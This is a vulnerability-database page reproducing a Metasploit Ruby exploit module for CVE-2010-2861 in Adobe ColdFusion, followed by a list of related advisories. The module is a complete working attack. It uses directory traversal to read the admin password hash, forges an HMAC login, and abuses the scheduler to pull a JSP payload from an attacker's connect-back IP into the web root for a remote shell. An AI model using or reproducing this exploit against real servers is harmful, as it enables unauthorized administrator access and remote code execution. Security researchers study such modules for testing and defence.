Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-15625
HistoryMar 17, 2011 - 12:00 a.m.

Adobe ColdFusion - Directory Traversal

2011-03-1700:00:00
metasploit
0day.today
29
JSON

Exploit for windows platform in category remote exploits

##
# $Id: coldfusion_traversal.rb 11974 2011-03-16 01:38:16Z mc $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Adobe ColdFusion - Directory Traversal',
            'Description'    => %q{
                    This module exploits a directory traversal bug in Adobe ColdFusion.
                By reading the password.properties a user can login using the encrypted
                password itself. This should work on version 8 and below.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [ 'webDEViL' ],
            'Version'        => '$Revision: 11974 $',
            'References'     =>
                [
                    [ 'CVE', '2010-2861' ],
                    [ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],  
                    [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],       
                ],
            'Privileged'    => true,
            'Platform'      => ['linux','windows'],
            'Stance'        => Msf::Exploit::Stance::Aggressive,
            'Targets'       =>
                [
                    [ 'Universal',
                        {
                            'Arch' => ARCH_JAVA,
                            'Payload' => 'java'
                        }
                    ],
                ],
 
            'DisclosureDate' => 'Aug 25 2010',
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
                OptString.new('URL',   [ true, 'Administrator Directory', '/CFIDE/administrator/' ]),
                OptString.new('CBIP',  [ true, 'Connect Back IP (even when not using reverse shell)', nil ]),
                OptString.new('TRAV',  [ false, 'Location of the password.properties file eg. ../../../../ColdFusion8/lib/password.properties%00en', nil ]), 
            ], self.class)
 
    end
     
    def exploit
     
        ip = datastore['RHOST']
        url = datastore['URL']+"enter.cfm"
        locale = "?locale="
        trav = datastore['TRAV'] || "../../../../../../../../../../../../../../../../../../../../../../lib/password.properties%00en"
        datastore['JSP'] = "wD-"+rand_text_alphanumeric(6)+".jsp"
        datastore['URIPATH'] = rand_text_alphanumeric(6)
         
        print_status("Trying to acheive Directory Traversal...")
        while trav.match(/..\//im)
            res = send_request_raw({
                'uri'     => url+locale+trav,
                'method'  => 'GET',
                'headers' =>
                    {
                        'Connection' => "keep-alive",
                        'Accept-Encoding' => "zip,deflate",
                    },
                }, -1)
     
            if (res.nil?)
                print_error("no response for #{ip}:#{rport} #{url}")
            elsif (res.code == 200)
                #print_error("#{res.body}")#debug
                 
                if match = res.body.match(/([0-9A-F]{40})/im);
                    caphash = $1
                    print_status("URL: #{ip}#{url}?locale=#{trav}")
                    print_status("Admin Hash: " + caphash)
                    break
                else
                    #select(nil, nil, nil, 3)
                    trav=trav[3..-1]
                    print_status("Trav:"+trav)
                     
                end
                 
            else
                ''
            end
        end
         
        if caphash.nil?
            print_error("Could not determine location of password.properties file, Set TRAV option manually")
            print_error("OR ColdFusion is not vulnerable")
            return
        end
         
        keyz = Time.now.to_i.to_s+"123"
        print_status("Time: "+ keyz)
        loghash= OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('sha1'), keyz, caphash).unpack('H*')[0].upcase
        print_status("Login Hash: "+loghash)
         
        params =  'cfadminPassword='+loghash
        params << '&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F&'
        params << 'salt='+keyz
        params << '&submit=Login'
 
        res = send_request_cgi({
            'method'    => 'POST',
            'uri'       => url,
            'data'  => params
        })
 
        if (res)
            #print_status("Me want Cookie: "+ res.headers['Set-Cookie'])
            if (res.headers['Set-Cookie'].match(/([A-Za-z0-9]{20,200})/im);)
                session = $1
                print_status("Cookie: #{session}")
            else
                print_error("Error retrieving cookie!")
            end
        else
            print_error("No response received while logging in.")
        end
 
        print_status("Attempting to automatically detect the platform...")
        ##AUTO_DETECT START
        path = datastore['URL'] + 'settings/mappings.cfm'
        res = send_request_raw(
            {
                'uri'    => path,
                'headers' =>
                    {
                        'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}"
                    }
            }, 20)
 
        if (not res) or (res.code != 200)
            print_error("Failed: Error requesting #{path}")
            return nil
        end
 
        if (res.body.match(/.*td *>(.*CFIDE&nbps;)/im);)
            os = $1
            os.match(/<td [^>]*?>(.*)&nbsp/im);
            os1 =$1
            os1 = os1.gsub("\t", '')
            os1 = os1.gsub("\r\n", '')
 
            if (os1 =~ /:/i) #haha ;)
                print_status('OS: Windows')
                datastore['SHELL'] = 'cmd.exe'
                os1=os1+"\\"       
            else #(os1 =~ /\//i)
                print_status('OS: Linux')
                datastore['SHELL'] = '/bin/sh'
                os1=os1+"/"
            end
            print_status("Web Directory:"+os1)
        end
 
        ##AUTO_DETECT END
 
        res = send_request_raw(
            {
                'uri'     => "/CFIDE/administrator/scheduler/scheduleedit.cfm?submit=Schedule+New+Task",
                'method'  => 'GET',
                'headers' =>
                    {
                        'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}",
                    }
            }, 25)
 
        if (res.body.match(/<input name="StartTimeOnce".*?value="(.*?)">/im);)
            start_time = $1
        end
 
        if (res.body.match(/<input name="Start_Date".*?value="(.*?)" id="Start_Date">/im);)       
            start_date = $1
        end
        #else FAIL!
        comb = start_date + start_time
        fmt = "%b %d, %Y%I:%M %p"
 
        comb = ((DateTime.strptime(comb,fmt)).advance :minutes =>-19)
        t = comb.strftime("%b %d, %Y")
        t1 = comb.strftime("%I:%M %p")
        #t=(Time.now).strftime("%b %d, %Y") #can't use local time
        #t1=(Time.now + 5).strftime("%I:%M:%S %p")
        params =  'TaskName=wD-'+rand_text_alphanumeric(6)
        params << "&Start_Date=#{t}" #Mar+12%2C+2011
        params << '&End_Date=&ScheduleType=Once'
        params << "&StartTimeOnce=#{t1}" #6%3A40+PM
        params << ' &Interval=Daily&StartTimeDWM=&customInterval_hour=0&customInterval_min=0&customInterval_sec=0&CustomStartTime=&CustomEndTime=&Operation=HTTPRequest'
        params << '&ScheduledURL=http%3A%2F%2F'+datastore['CBIP']+":"+datastore['SRVPORT']+"/"+datastore['URIPATH']
        params << '&Username=&Password=&Request_Time_out=&proxy_server=&http_proxy_port=&publish=1'
        params << '&publish_file='+os1+datastore['JSP']
        params << '&adminsubmit=Submit&taskNameOrig='
         
        res = send_request_raw(
            {
                'uri'     => "/CFIDE/administrator/scheduler/scheduleedit.cfm",
                'method'  => 'POST',
                'data'    => params,
                'headers' =>
                    {
                        'Content-Type'   => 'application/x-www-form-urlencoded',
                        'Content-Length' => params.length,
                        'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}",
                    }
            }, 25)
        #print_error("#{res.body}")
        super
    end
         
    def on_request_uri(cli, request)
        p = regenerate_payload(cli)
        #print_status("SHELL set to #{datastore['SHELL']}")
        #print_status((p.encoded).to_s)
         
        print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 
        # Transmit the response to the client
        send_response(cli, p.encoded, { 'Content-Type' => 'text/html' })
 
        res = send_request_raw(
            {
                'uri'     => "/CFIDE/"+datastore['JSP'],
                'method'  => 'GET',
            }, 25)
        # Handle the payload
        handler(cli)
    end
end



#  0day.today [2018-03-05]  #

Related

nuclei 1
prion 2
cve 2
zdt 1
exploitdb 2
metasploit 1
securityvulns 1
packetstorm 3
cvelist 2
nvd 2
attackerkb 1
checkpoint_advisories 1
exploitpack 1
cisa_kev 1
seebug 2
openvas 2
nessus 1
canvas 1
thn 1
threatpost 1
nmap 1
nuclei
nuclei
Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
2021-03-01 04:26:27
prion
prion
Directory traversal
2010-08-11 18:47:00
Design/Logic Flaw
2013-09-20 16:55:00
cve
cve
CVE-2010-2861
2010-08-11 18:47:51
CVE-2010-5290
2013-09-20 16:55:03
zdt
zdt
Adobe ColdFusion Directory Traversal Vulnerability
2010-08-14 00:00:00
exploitdb
exploitdb
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
Adobe ColdFusion - Directory Traversal (Metasploit)
2011-03-16 00:00:00
metasploit
metasploit
ColdFusion Server Check
2010-09-01 01:57:22
securityvulns
securityvulns
PR10-07: Unauthenticated File Retrieval &#40;traversal&#41; within ColdFusion administration console
2010-08-12 00:00:00
packetstorm
packetstorm
Adobe ColdFusion - Directory Traversal
2011-03-16 00:00:00
ColdFusion Server Check
2024-09-01 00:00:00
Adobe ColdFusion Directory Traversal
2010-08-17 00:00:00
cvelist
cvelist
CVE-2010-2861
2010-08-11 18:00:00
CVE-2010-5290
2013-09-20 16:00:00
nvd
nvd
CVE-2010-2861
2010-08-11 18:47:51
CVE-2010-5290
2013-09-20 16:55:03
attackerkb
attackerkb
CVE-2010-2861
2010-08-11 00:00:00
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Directory Traversal (APSB10-18; CVE-2010-2861)
2010-09-05 00:00:00
exploitpack
exploitpack
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
cisa_kev
cisa_kev
Adobe ColdFusion Directory Traversal Vulnerability
2022-03-25 00:00:00
seebug
seebug
Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)
2014-07-01 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-30 00:00:00
openvas
openvas
Adobe ColdFusion Directory Traversal Vulnerability (APSB10-18)
2010-09-02 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-02 00:00:00
nessus
nessus
Adobe ColdFusion 'locale' Parameter Directory Traversal
2010-08-16 00:00:00
canvas
canvas
Immunity Canvas: CF_DIRECTORY_TRAVERSAL
2010-08-11 18:47:00
thn
thn
Cring Ransomware Gang Exploits 11-Year-Old ColdFusion Bug
2021-09-21 12:27:00
threatpost
threatpost
12 New Flaws Used in Ransomware Attacks in Q3
2021-11-09 18:06:33
nmap
nmap
http-vuln-cve2010-2861 NSE Script
2012-02-19 14:40:01
JSON
Related for 1337DAY-ID-15625
nuclei1prion2cve2zdt1exploitdb2metasploit1securityvulns1packetstorm3cvelist2nvd2attackerkb1checkpoint_advisories1exploitpack1cisa_kev1seebug2openvas2nessus1canvas1thn1threatpost1nmap1